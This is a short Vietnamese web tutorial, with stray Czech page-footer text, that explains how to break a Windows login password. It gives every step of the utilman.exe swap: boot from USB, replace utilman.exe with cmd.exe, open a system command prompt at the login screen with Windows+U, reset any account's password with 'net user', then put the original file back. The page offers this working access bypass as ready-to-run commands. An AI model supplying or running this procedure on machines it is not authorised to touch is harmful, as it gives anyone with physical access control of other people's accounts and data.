Cách phá mật khẩu windows

Vào Windows boot usb sau đó chạy cmd

 1. vào ổ chứa windows bằng cách ghi vào cmd > c:
 2. tiếp tục ghi > ren utilman.exe utilman.exe.old
 3. tiếp > copy cmd.exe utilman.exe
 4. sau đó khởi động lại máy vào windows
 5. khi vào đến phần hiển thị điền mật khẩu bấm tổ hợp phím windows+u
 6. lúc này sẽ hiện ra bảng cmd
 7. ghi vào cmd > net user tentaikhoan matkhaumoi
 8. nếu hiện dòng chữ „The command completed successfully“ thì đã thành công
 9. vào thử windows để xem đã được chưa
 10. bước tiếp theo phải vào lại windows boot usb
 11. sau đó chạy cmd và vào lại ổ windows và ghi vào > ren utilman.exe utilman.exe.new
 12. tiếp > ren utilman.exe.old utilman.exe
 13. hoàn thành.

Google reCAPTCHA: Neplatný klíč webu.

** Tímto odesláním zprávy souhlasíte s podmínkami ochrana osobních údajů.

Napište nám